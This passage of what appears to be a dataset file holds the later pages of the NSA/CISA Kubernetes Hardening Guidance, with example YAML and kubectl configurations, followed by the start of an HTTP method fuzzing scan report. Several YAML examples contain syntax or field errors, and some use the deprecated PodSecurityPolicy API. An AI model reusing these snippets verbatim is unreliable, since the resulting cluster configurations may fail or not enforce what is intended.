\nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nSYSLOG \nKubernetes , by default , writes kubelet logs and container runtime logs to journald if \nthe service is available. If organizations wish to utilize syslog utilities for systems that do \nnot use them by default —or to collect logs from across the cluster and forward them to \na syslog server or other log storage and aggregation platform —they can configure that \ncapability manually. Syslog protocol defines a log message -formatting standard. Syslog \nmessages include a header —consisting of a timestamp, hostname, application name, \nand process ID (PID) —and a message written in plaintext. Syslog services such as \nsyslog -ng® and rsyslog are capable of collecting and aggregating logs from across a \nsystem in a unified format. Many Linux operating systems by default use rsyslog or \njournald —an event logging daemon, w hich optimizes log storage and output logs in \nsyslog format via journalctl. The syslog utility, on nodes running certain Linux \ndistributions logs events , by default, at the operating system level. Containers running \nthese Linux distributions will , by defau lt, collect logs using syslog as well. The logs that \nare collected by syslog utilities are stored in the local file system on each applicable \nnode or container unless a log aggregation platform is configured to collect them. \nSIEM platforms \nSecurity Inform ation and Event Management (SIEM) software collects logs from across \nan organization’s network . SIEM software bring s together firewall logs, application logs, \nand more ; parsing them out to provide a centralized platform from which analysts can \nmonitor syst em security. SIEM tools have variations in their capabilities. Generally, \nthese platforms provide log collection, threat detection, and alerting capabilities. Some \ninclude machine learning capabilities, which can better predict system behavior and \nhelp to reduce false alerts. Organizations using these platforms in their environment can \nintegrate them with Kubernetes to better monitor and secure clusters. Open source \nplatforms for managing logs from a Kubernetes environment exist as an alternative to \nSIEM platforms. \nContainerized environments have many interdependencies between nodes, Pods, \ncontainers, and services. In these environments, Pods and containers are constantly \nbeing taken down and restarted on different nodes. This presents a n extra challenge f or \ntraditional SIEMs , which typically use IP addresses to correlate logs. Even next-gen \nSIEM platforms may not always be suited to the complex Kubernetes environment. \nHowever, as Kubernetes has emerged as the most widely used container orchestration \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 28 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nplatfo rm, many of the organizations developing SIEM tools have developed variations of \ntheir products specifically designed to work with the Kubernetes environment , providing \nfull monitoring solutions for these containerized environments. Administrators should b e \naware of their platform’s capabilities and ensure that their logging sufficiently captures \nthe environment to support future incident responses. \nAlerting \nKubernetes does not natively support alerting; however, several monitoring tools with \nalerting capa bilities are compatible with Kubernetes. If Kubernetes administrators \nchoose to configure an alerting tool to work within a Kubernetes environment , there are \nseveral metrics for which administrators should monitor and configure alerts. \nExamples of cases t hat could trigger alerts include but are not limited to: \n low disk space on any of the machines in the environment , \n available storage space on a logging volume running low , \n external logging service going offline , \n a Pod or application running with root permi ssions , \n requests being made by an account for resources they do not have permission \nfor, \n an anonymous account being used or gaining privileges , \n Pod or Worker Node IP addresses being listed as the source ID of a Pod creation \nrequest , \n unusual system calls or failed API calls , \n user/admin behavior that is abnormal ( i.e. at unusual times or from an unusual \nlocation) , and \n significant deviations from the standard operation metrics baseline . \nAlerting when storage is low can help avoid performance issues and log los s due to \nlimited resources and help identify malicious cryptojacking attempts. Cases of privileged \nPod execution can be investigated to determine if an administrator made a mistake, an \nauthentic use case necessitat es escalated privileges, or a malicious actor deployed a \nprivileged Pod . Suspicious Pod creation source IP addresses could indicate that a \nmalicious cyber actor has broken out of a container and is attempting to create a \nmalicious Pod. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 29 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nIntegrating Kubernete s with an organization’s existing SIEM platform, especially those \nwith machine learning/big data capabilities, can be useful in identifying irregularities in \naudit logs and cutting down on false alerts. If configuring such a tool to work with \nKubernetes, i t should be configured so that these cases and any others applicable to \nthe use case are configured to trigger alerts. \nSystems capable of acting automatically when suspected intrusions occur could \npotentially be configured to take steps to mitigate comprom ises while administrators \nrespond to alerts. In the case of a Pod IP being listed as the source ID of a Pod creation \nrequest, one mitigation that could be implemented to keep the application available but \ntemporarily stop any compromises of the cluster wou ld be to automatically evict the \nPod. Doing so would allow a clean version of the Pod to be rescheduled onto one of the \nnodes. Investigators can then examine the logs to determine if a breach occurred and, if \nso, how the malicious actors executed the compr omise so that a patch can be \ndeployed. \nService meshes \nService meshes are platforms that streamline microservice communications within an \napplication by allowing for the logic of these communications to be coded into the \nservice mesh rather than within eac h microservice. Coding this communication logic into \nindividual microservices is difficult to scale, difficult to debug as failures occur, and \ndifficult to secure. Using a service mesh can simplify this for developers. The mesh can : \n redirect traffic when a service is down , \n gather performance metrics for optimizing communications , \n allow management of service -to-service communication encryption , \n collect logs for service -to-service communication , \n collect logs from each service , and \n help developers diagnose problems and failures of microservic es or \ncommunication mechanisms . \nService meshes can also help with migrating services to hybrid or multi -cloud \nenvironments. While service meshes are not necessary, they are an option that is highly \nsuitable to the Kubern etes environment. Managed Kubernetes services often include \ntheir own service mesh. However, several other platforms are also available and , if \ndesired, are highly customizable. Some of these include a Certificate Authority that \ngenerates and rotates certi ficates, allowing for secure TLS authentication between \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 30 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nservices. Administrators should consider using service meshes to harden Kubernetes \ncluster security. \n \nFigure 5: Cluster leveraging service mesh to integrate logging with net work security \nFault tolerance \nFault tolerance policies should be put in place to ensure logging service availability. \nThese policies could differ depending on the specific Kubernetes use case. One policy \nthat can be put in place is to allow new logs to overwrite the oldest log files if absolutely \nnecessary in the event of storage capacity being exceeded. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 31 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nIf logs are being sent to an external service, a mechanism should be in place for logs to \nbe stored locally if a communication loss or external service failure occurs. Once \ncommunicati on to the external service is restored, a policy should be in place for the \nlocally stored logs to be pushed up to the external server. \nTools \nKubernetes does not include extensive auditing capabilities. However, the system is \nbuilt to be extensible, allow ing users the freedom to develop their own custom solution \nor to choose an existing add -on that suits their needs. One of the most common \nsolutions is to add additional audit backend services, which can use the information \nlogged by Kubernetes and perform additional functions for users , such as extended \nsearch parameters, data mapping features, and alerting functionality. Organizations that \nalready use SIEM platforms can integrate Kubernetes with these existing capabilities. \nOpen -source monitoring tools —such as the Cloud Native Computing Foundation’s \nPrometheus®, Grafana Labs’ Grafana®, and Elasticsearch’s Elastic Stack (ELK)®—are \navailable to conduct event monitoring, run threat analytics, manage alerting, and collect \nresource isolation parameters, historic al usage, and network statistics on running \ncontainers. Scanning tools can be useful when auditing the access control and \npermission configurations by assisting in identifying risky permission configurations in \nRBAC. NSA and CISA encourage organizations ut ilizing Intrusion D etection Systems \n(IDSs) on their existing environment to consider integrating that service into their \nKubernetes environment as well . This integration would allow an organization to monitor \nfor—and potentially kill containers showing sig ns of—unusual behavior so the \ncontainers can be restarted from the initial clean image. Many c loud service providers \nalso provide container monitoring services for those wanting more managed and \nscalable solutions. \n▲Return to C ontents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 32 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nUpgrading and application security practices \nFollowing the hardening guidance outlined in this document is a step toward ensuring \nthe security of applications running on Kubernetes orchestrated containers. However, \nsecurity is an ongoing process , and it is vital to keep up with patches, updates, and \nupgrades. The specific software components vary depending on the individual \nconfiguration, but each piece of the overall system should be kept as secure as \npossible. This includes updating : Kubernetes, hypervisors, virtualization software, \nplugins, operating systems on which the environment is running, applications running on \nthe servers, and any other software hosted in the Kubernetes environment. \nThe Center for Internet Security (CIS) publishes bench marks for securing software. \nAdministrators should adhere to the CIS benchmarks for Kubernetes and any other \nrelevant system components. Administrators should check periodically to ensure their \nsystem 's security is compliant with the current security exper ts’ consensus on best \npractices. Periodic vulnerability scans and penetration tests should be performed on the \nvarious system components to proactively look for insecure configurations and zero-day \nvulnerabilities. Any discoveries should be promptly remedi ated before potential cyber \nactors can discover and exploit them. \nAs updates are deployed, administrators should also keep up with removing any old \ncomponents that are no longer needed from the environment. Using a managed \nKubernetes service can help to a utomate upgrades and patches for Kubernetes, \noperating systems, and networking protocols. However, administrators must still patch \nand upgrade their containerized applications. \n▲Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 33 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nWorks cited \n[1] Center for Internet Security, \"Kubernetes,\" 2021. [Online]. Available: \nhttps://cisecurity.org/ resources/?type=benchmark&search=kubernetes . \n[2] DISA, \"Kubernetes STIG,\" 2021. [Online]. Available: https:/ /dl.dod.cyber.mil.wp -\ncontent/uploads/stigs/zip/ U_Kubernetes_V1R1_STIG.zip . [Accessed 8 July 2021] \n[3] The Linux Foundation, \"Kubernetes Docum entation,\" 2021. [Online]. Available: \nhttps://kubernetes.io/docs/ home /. [Accessed 8 July 2021]. \n[4] The Linux Foundation, \"11 Ways (Not) to Get Hacked,\" 18 07 2018. [Online]. \nAvailable: https://kubernetes.io/blog/2018/07/18/11 -ways -not-to-get-hacked/#10 -\nscan -images -and-run-ids. [Accessed 8 July 2021]. \n[5] MITRE, \" Unsecured Credentials: Cloud Instance Metadata API. \" MITRE ATT&CK, \n2021. [Online]. Available: htt ps://attack.mitre.org/te chniques/T1552/005/. [Accessed \n8 July 2021]. \n[6] CISA, \"Analysis Report (AR21 -013A): Strengthening Security Configurations to \nDefend Against Attackers Targeting Cloud Services. \" Cybersecurity and \nInfrastructure Security Agency, 14 January 2021. [Online ]. Available:https://us -\ncert.cisa.gov/ncas/analysis -reports/ar21 -013a [Accessed 8 July 2021]. \n \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 34 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix A: Example Dockerfile for non -root application \nThe following example is a Dockerfile that runs an application as a non -root user with \nnon-group membership. The lines highlighted in red below are the portion specific to \nusing non -root. \nFROM ubuntu:latest \n \n#Update and install the make utility \nRUN apt update && apt install -y make \n \n#Copy the source from a folder called “code” and build the application with \nthe make utility \nCOPY . /code \nRUN make /code \n \n#Create a new user (user1) and new group (group1); then switch into that \nuser’s context \nRUN useradd user1 && groupadd group1 \nUSER user1:group1 \n \n#Set the default entrypoint for the container \nCMD /code/app \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 35 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix B: Example deployment template for read -only file \nsystem filesystem \nThe following is an example Kubernetes deployment template that uses a read -only root \nfile system. The lines highlighted in red below are the portion specific to making the \ncontainer’s filesystem read -only. The lines highlighted in blue are the portion showing \nhow to create a writeable volume for applications requiring this capability. \napiVersion: apps/v1 \nkind: Deployment \nmetadata : \n labels: \n app: web \n name: web \nspec: \n selector: \n matchLabels: \n app: web \n template: \n metadata: \n labels: \n app: web \n name: web \n spec: \n containers: \n - command: [\"sleep\"] \n args: [\"999\"] \n image: ubuntu:latest \n name: web \n securityContext: \n readOnlyRootFilesystem: true \n volumeMounts: \n - mountPath: /writeable/location/here \n name: volName \n volumes: \n - emptyDir: {} \n name: volName \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 36 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix C: Example Pod Security Policy \nThe following is an example Kubernetes Pod Security Policy that enforces strong \nsecurity requirements for containers running in the cluster. This example is based on \nofficial Kubernetes documentation: https://kubernetes.io/docs/concepts/policy/pod -\nsecurity -policy/ . Administrators are encouraged to tailor the policy to meet their \norganization’s requirements. \napiVersion: pol icy/v1beta1 \nkind: PodSecurityPolicy \nmetadata: \n name: restricted \n annotations: \n seccomp.security.alpha.kubernetes.io/allowedProfileNames: \n'docker/default,runtime/default' \n apparmor.security.beta.kubernetes.io/allowedProfileNames: \n'runtime/default' \n seccomp.security.alpha.kubernetes.io/defaultProfileName: \n'runtime/default' \n apparmor.security.beta.kubernetes.io/defaultProfileName: \n'runtime/default' \nspec: \n privileged: false # Required to prevent escalations to root. \n allowPrivilegeEscalation: false \n requiredDropCapabilities: \n - ALL \n volumes: \n - 'configMap' \n - 'emptyDir' \n - 'projected' \n - 'secret' \n - 'downwardAPI' \n - 'persistentVolumeClaim' # Assume persistentVolumes set up by admin \nare safe \n hostNetwork: false \n hostIPC: false \n hostPID: false \n runAsUser: \n rule: 'MustRunAsNonRoot' # Require the container to run without root \n seLinux: \n rule: 'RunAsAny' # This assumes nodes are using AppArmor rather than \nSELinux \n supplementalGroups: \n rule: 'MustRunAs' \n ranges: # Forbid adding the root group. \n - min: 1 \n max: 65535 \n runAsGroup: \n rule: 'MustRunAs' \n ranges: # Forbid adding the root group. \n - min: 1 \n max: 65535 \n fsGroup: \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 37 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n rule: 'MustRunAs' \n ranges: # Forbid adding the root group. \n - min: 1 \n max: 65535 \n readOnlyRootFilesystem: true \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 38 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix D: Example namespace \nThe following example is for each team or group of users, a Kubernetes namespace \ncan be created using either a kubectl command or YAML file. Any name with the \nprefix kube- should be avoided as it may conflict with Kubernetes system reserved \nnamespaces. \nKubectl command to create a namespace : \nkubectl create namespac e <insert -namespace -name-here> \nTo create namespace using YAML file, create a new file called my-namespace.yaml \nwith the contents: \napiVersion: v1 \nkind: Namespace \nmetadata: \n name: <insert -namespace -name-here> \n \nApply the namespace using : \nkubectl create –f ./my-namespace.yaml \nTo create new Pods in an existing namespace, switch to the desired namespace using: \nkubectl config use -context <insert -namespace -here> \nApply new deployment using: \nkubectl apply -f deployment.yaml \nAlternatively, the namespace can be adde d to the kubectl command using: \nkubectl apply -f deployment.yaml --namespace=<insert -namespace -here> \nor specify namespace: <insert -namespace -here> under metadata in the YAML \ndeclaration. \nOnce created, resources cannot be moved between namespaces. The resou rce must \nbe deleted, then created in the new namespace. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 39 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix E: Example network policy \nNetwork policies differ depending on the network plugin used. The following is an \nexample network policy to limit access to the nginx service to Pods with the label \naccess using the Kubernetes documentation : \nhttps://kubernetes.io/docs/tasks/administer -cluster/declare -network -policy/ \napiVersion: networking.k8s.io/v1 \nkind: NetworkPolicy \nmetadata: \n name: example -access-nginx \n namespace: prod #this can any namespace or be left out if no \nnamespace is used \nspec: \n podSelector: \n matchLabels: \n app: nginx \n ingress: \n -from: \n -podSelector: \n matchLabels: \n access: “true” \n \nThe new NetworkPolicy can be applied using: \nkubectl apply -f policy.yaml \nA default deny all ingress policy: \napiVersion: networking.k8s.io/v1 \nkind: NetworkPolicy \nmetadata: \n name: deny -all-ingress \nspec: \n podSelector: {} \n policyType: \n - Ingress \n \nA default deny all egress policy: \napiVersion: networking.k8s.io/v1 \nkind: NetworkPolicy \nmetadata: \n name: deny -all-egress \nspec: \n podSelector: {} \n policyType: \n - Egress \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 40 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix F: Example LimitRange \nLimitRange support is enabled by default in Kubernetes 1.10 and newer. The following \nYAML file specifies a LimitRange with a default request and limit , as well as a min and \nmax request , for each container . \napiVersion: v1 \nkind: LimitRange \nmetadata: \n name: cpu -min-max-demo-lr \nspec: \n limits \n - default: \n cpu: 1 \n defaultRequest: \n cpu: 0.5 \n max: \n cpu: 2 \n min: \n cpu 0.5 \n type: Container \n \nA LimitRange can be applied to a namespace with: \nkubectl apply -f <example -LimitRange>.yaml --namespace=<Enter -Namespace> \n \nAfter this example LimitRange configuration is applied , all containers created in the \nnamespace are assigned the default CPU request and limit if not specified. All \ncontainers in the namespace must h ave a CPU request greater than or equal to the \nminimum value and less than or equal to the maximum CPU value or the container will \nnot be instantiated . \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 41 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix G: Example ResourceQuota \nResourceQuota objects to limit aggregate resource usage within a namespace are \ncreated by applying a YAML file to a namespace or specifying requirements in the \nconfiguration file of Pods. The following example is based on official Kubernetes \ndocumentation: https://kubernetes.io/docs/tasks/administer -cluster/manage -\nresources/quota -memory -cpu-namespace/ \nConfiguration file for a namespace: \napiVersion: v1 \nkind: ResourceQuota \nmetadata: \n name: example -cpu-mem-resourcequota \nspec: \n hard: \n requests.cpu: “1” \n requests.memory: 1Gi \n limits.cpu: “2” \n limits.memory: 2Gi \n \nThis ResourceQuota can be applied with: \nkubectl apply -f example -cpu-mem-resourcequota.yaml --\nnamespace=<insert -namespace -here> \nThis ResourceQuota places the following constraints on the chosen namespace: \n Every container must have a memory request, memory limit, CPU request, and \nCPU limit \n Aggregate m emory request for all containers should not exceed 1 GiB \n Total m emory limit for all containers should not exceed 2 GiB \n Aggregate CPU request for all containers should not exceed 1 CPU \n Total CPU limit for all containers should not exceed 2 CPUs \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 42 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix H: Example encryption \nTo encrypt Secret data at rest, the following encryption configuration file provides an \nexample to specify the type of encryption desired and the encryption key. Storing the \nencryption key in the encryption file only slightly improves security. The Secrets will be \nencrypted, but the key will be accessible in the EncryptionConfigu ration file. This \nexample is based on official Kubernetes documentation: \nhttps://kubernetes.io/docs/tasks/administer -cluster/encrypt -data/ . \napiVersion: apiserver.config.k8s.i o/v1 \nkind: EncryptionConfiguration \nresources: \n - resources: \n - secrets \n providers: \n - aescbc: \n keys: \n - name: key1 \n secret: <base 64 encoded secret> \n - identity: {} \n \nTo enable encryption at rest with this encryption file, restart the API server with the --encryption -\nprovider -config flag set with the location to the config uration file. \n \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 43 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix I: Example KMS configuration \nTo encrypt Secrets with a Key Management Service (KMS) provider plugin, the \nfollowing example encryption configuration YAML file can be used to set the properties \nfor the provider. This example is based on official Kubernetes documentation: \nhttps://kubernetes.io/docs/tasks/administer -cluster/kms -provider/ . \napiVersion: apiserver.config.k8s.io/v1 \nkind: EncryptionConfiguration \nresources: \n - resources: \n - secrets \n providers: \n - kms: \n name: myKMSPlugin \n endpoint: unix://tmp/socketfile.sock \n cachesize: 100 \n timeout: 3s \n - identity: {} \n \nTo configure the API server to use the KMS provider, set the --encryption -\nprovider -config flag with the location of the configuration file and restart the API \nserver. \nTo switch from a local encryption provider to KMS, add the KMS provider section of the \nEncryptionConfiguration file above the current encryption method , as shown below. \napiVersi on: apiserver.config.k8s.io/v1 \nkind: EncryptionConfiguration \nresources: \n - resources: \n - secrets \n providers: \n - kms: \n name: myKMSPlugin \n endpoint: unix://tmp/socketfile.sock \n cachesize: 100 \n timeout: 3s \n - aescbc: \n keys: \n - name: key1 \n secret: <base64 encoded secret> \n \nRestart the API server and run the command below to re -encrypt all Secrets with the \nKMS provider. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 44 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nkubectl get secrets --all-namespaces -o json | kubectl replace -f - \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 45 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix J: Example pod -reader RBAC Role \nTo create a pod -reader Role , create a YAML file with the following contents: \napiVersion: rbac.authorization.k8s.io/v1 \nkind: Role \nmetadata: \n namespace: your -namespace -name \n name: pod-reader \nrules: \n- apiGroups: [“”] # “” indicates the core API group \n resources: [“pods”] \n verbs: [“get”, “watch”, “list”] \n \nApply the Role using: \nkubectl apply --f role.yaml \nTo create a global -pod-reader ClusterRole: \napiVersion: rbac.authorization.k8s.io/v1 \nkind: ClusterRole \nmetadata: default \n # “namespace” omitted since ClusterRoles are not bound to a \nnamespace \n name: global -pod-reader \nrules: \n- apiGroups: [“”] # “” indicates the core API group \n resources: [“pods”] \n verbs: [“get”, “watch”, “list”] \n \nApply the Role using: \nkubectl apply --f clusterrole.yaml \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 46 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix K: Example RBAC RoleBinding and \nClusterRoleBinding \nTo create a RoleBinding, create a YAML file with the following contents: \napiVersion: rbac.authorization.k8s.io/v1 \n# This role binding allows “jane” to read Pods in the “your -\nnamespace -name” \n# namespace. \n# You need to already have a Role names “pod -reader” in that \nnamespace. \nkind: RoleBinding \nmetadata: \n name: read -pods \n namespace: your -namespace -name \nsubjects: \n# You can specify more than one “subject” \n- kind: User \n name: jane # “name” is case sensitive \n apiGroup: rbac.authorization.k8s.io \nroleRef: \n # “roleRef” specifies the binding to a Role/ClusterRole \n # kind: Role # this must be a Role or ClusterRole \n # this must match the name of the Role or ClusterRole you wish to \nbind \n # to \n name: pod -reader \n apiGroup: rbac.authorization.k8s.io \nApply the RoleBinding using: \nkubectl apply --f rolebinding.yaml \nTo create a ClusterRoleBinding, create a YAML file wi th the following contents: \napiVersion: rbac.authorization.k8s.io/v1 \n# This cluster role binging allows anyone in the “manager” group to \nread \n# Pod information in any namespace. \nkind: ClusterRoleBinding \nmetadata: \n name: global -pod-reader \nsubjects: \n# You can specify more than one “subject” \n- kind: Group \n name: manager # Name is case sensitive \n apiGroup: rbac.authorization.k8s.io \nroleRef: \n # “roleRef” specifies the binding to a Role/ClusterRole \n kind: ClusterRole # this must be a Role or ClusterRole \n name: global -pod-reader # this must match the name of the Role or \nClusterRole you wish to bind to \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 47 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n apiGroup: rbac.authorization.k8s.io \nApply the RoleBinding using: \nkubectl apply --f clusterrolebi nding.yaml \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 48 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix L: Audit Policy \nThe following is an Audit Policy that logs all audit events at the highest level : \napiVersion: audit.k8s.io/v1 \nkind: Policy \nrules: \n - level: RequestResponse \n # This audit policy logs all audit events at the RequestResponse \nlevel \n \nThis audit policy logs all events at the highest level. If an organization has the resources \navailable to store, parse, and examine a large number of logs, then logging all events at \nthe highest level is a good way of ensuring that , when an event oc curs, all necessary \ncontextual information is present in the logs. If resource consumption and availability is \na concern, then more logging rules can be established to lower the logging level of non -\ncritical components and routine non -privileged actions, a s long as audit requirements for \nthe system are being met. An example of how to establish these rules can be found in \nthe official Kubernetes documentation: https://kubernete s.io/docs/tasks/debug -\napplication -cluster/audit/ . \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 49 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix M: Example flags with which to submit Audit Policy \nfile to kube -apiserver \nIn the control plane , open the kube-apiserver.yaml file in a text editor. Editing the \nkube-apiserver configuration requires administrator privileges. \nsudo vi /etc/kubernetes/manifests/kube -apiserver.yaml \n \nAdd the following text to the kube-apiserver.yaml file: \n --audit-policy-file=/etc/kubernetes/policy/audit -policy.yaml \n --audit-log-path=/var/log/audit.log \n --audit-log-maxage=1825 \n \nThe audit-policy-file flag should be set with the path to the audit policy , and the \naudit-log-path flag should be set with the desired secure location for the audit logs \nto be written to. Oth er additional flags exist, such as the audit-log-maxage flag \nshown here , which stipulates the maximum number of days the logs should be kept, \nand flags for specifying the maximum number of audit log files to retain, max log file size \nin megabytes, etc. The only flags necessary to enable logging are the audit-policy-\nfile and audit-log-path flags. The other flags can be used to configure logging to \nmatch the organization’s policies. \nIf a user’s kube-apiserver is run as a Pod, then it is necessary to mount the volume \nand configure hostPath of the policy and log file locations for audit records to be \nretained. This can be done by adding the following sections to the kube-\napiserver.yaml file as noted in the Kuber netes documentation : \nhttps://kubernetes.io/docs/tasks/debug -application -cluster/audit/ \nvolumeMounts: \n -mountPath: /etc/kubernetes/audit -policy.yaml \n name: audit \n readOnly: true \n -mountPath: /var/log/audit.log \n name: audit -log \n readOnly: false \n \nvolumes: \n- hostPath: \n path: /etc/kubernetes/audit -policy.yaml \n type: File \nname: audit \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 50 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n - hostPath: \n path: /var/log/audit.log \n type: FileOrCreate \nname: audit -log \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 51 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix N: Webhook configuration \nYAML file example : \napiVersion: v1 \nkind: Config \npreferences: {} \nclusters: \n- name: example -cluster \ncluster: \n server: http://127.0.0.1:8080 \n#web endpoint address for the log files to be sent to \n name: audit -webhook-service \n users: \n- name: example -users \nuser: \n username: example -user \n password: example -password \n contexts: \n- name: example -context \ncontext: \n cluster: example -cluster \n user: example -user \n current-context: example -context \n#source: https://dev.bitolog.com/implement -audits-webhook/ \nThe audit events sent by the webhook are sent as HTTP POST requests with the JSON \naudit events in the request body. The address specified should point to an endpoint \ncapable of accepting and parsing these audit events, whether it is a third -party service \nor an in -house configured endpoint. \nExample flags that submit webhook configuration file to kube-apiserver : \nIn the control plane edit the kube-apiserver.yaml file \n \nsudo vi /etc/kubernetes/manifests/kube -apiserver.yaml \n \nadd the following text to the kube-apiserver.yaml file \n--audit-webhook-config-file=/etc/kubernetes/policies/webhook -\npolicy.yaml \n--audit-webhook-initial-backoff=5 \n--audit-webhook-mode=batch \n--audit-webhook-batch-buffer-size=5 \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 52 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nThe audit-webhook-initial-backoff flag determines how long to wait after an \ninitial failed request before retrying. The available webhook modes are batch , \nblocking , and blocking -strict . When using batch mode , it is possible to \nconfigure the maximum wait, buffe r size, and more. The official Kubernetes \ndocumentation contains more details on the other configuration options: \nhttps://kubernetes.io/docs/tasks/debug -application -cluster/a udit/ and \nhttps://kubernetes.io/docs/reference/command -line-tools -reference/kube -apiserver/ \n \n \n \n \n \n " } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2022-08-09 02_29_43.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 4/Security Test Suite 1/https://137.184.10.129:443 TestCase\nSummary\nStarted at 2022-08-09 02:29:43\nTime taken 00:00:09.032\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PURGE https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP 